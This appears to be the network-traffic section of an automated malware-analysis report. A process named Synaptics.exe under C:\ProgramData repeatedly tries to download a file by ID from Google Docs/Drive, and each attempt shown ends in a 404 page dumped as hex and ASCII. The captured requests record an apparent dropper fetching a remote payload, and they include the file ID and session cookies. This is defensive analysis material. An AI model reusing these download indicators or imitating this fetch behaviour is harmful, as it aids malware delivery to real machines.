                                                                                                                            2024-12-30 10:24:24 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 32 41 34 53 42 32 35 42 42 39 31 55 7a 58 73 58 61 4e 43 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l2A4SB25BB91UzXsXaNCTw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                            2024-12-30 10:24:24 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.649803142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:24 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6moGVRYxMx8vVhzgVEbaPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.649813142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:25 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-htIgSiDbYiZXAWHZFi_Skg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.649814172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:25 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-30 10:24:25 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC6dn2YiMuFrEVz30xh86cgW93-3PVpCeJYuVa-n7kyBql0GKo1hFdSgyDauFKoAoV1TqsuSZjI
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:25 GMT
                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-RyFGItg9gk3Hmp-F8ePMjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Set-Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls; expires=Tue, 01-Jul-2025 10:24:25 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:25 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 2d 37 65 61 4e 73 6e 6f 39 78 73 76 69 45 6e 36 55 68 78 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P-7eaNsno9xsviEn6UhxlA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                            2024-12-30 10:24:25 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.649816142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:25 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Tir1M6stQ05BdJ2WBxJSEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.649817172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI
                                                                                                                            2024-12-30 10:24:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC5OUs6SLq_gifeKaWfdpW8szT43R6AulKqLDrTgdYvBbpR3pbfDkd0ReVRyEkQDO-S3nK3tmcY
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:25 GMT
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Npx_MsSYLtwC38RCVckNlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                            2024-12-30 10:24:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 42 65 32 48 57 79 70 6d 56 71 37 35 71 5f 37 30 37 63 79 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="cBe2HWypmVq75q_707cyhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                            2024-12-30 10:24:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.649824142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:26 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-vzOEp-yaMo556KYtcGo4jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.649826172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr
                                                                                                                            2024-12-30 10:24:27 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC5PadOovM7s9q5Wk1FfDLTsnskZrz30GV1YL-mQ5BpWt77CpHEb_GtuOiyxHGGXeWRZM0rBR2Y
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:26 GMT
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-blAmeqrZ0EEv6NGq11xvow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                            2024-12-30 10:24:27 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 47 54 6f 50 52 6a 33 59 30 6f 69 48 39 4e 55 78 43 55 65 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="FGToPRj3Y0oiH9NUxCUekA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                            2024-12-30 10:24:27 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.649825142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:26 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-IgJtK-WdFMFEYF3eXmwrWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
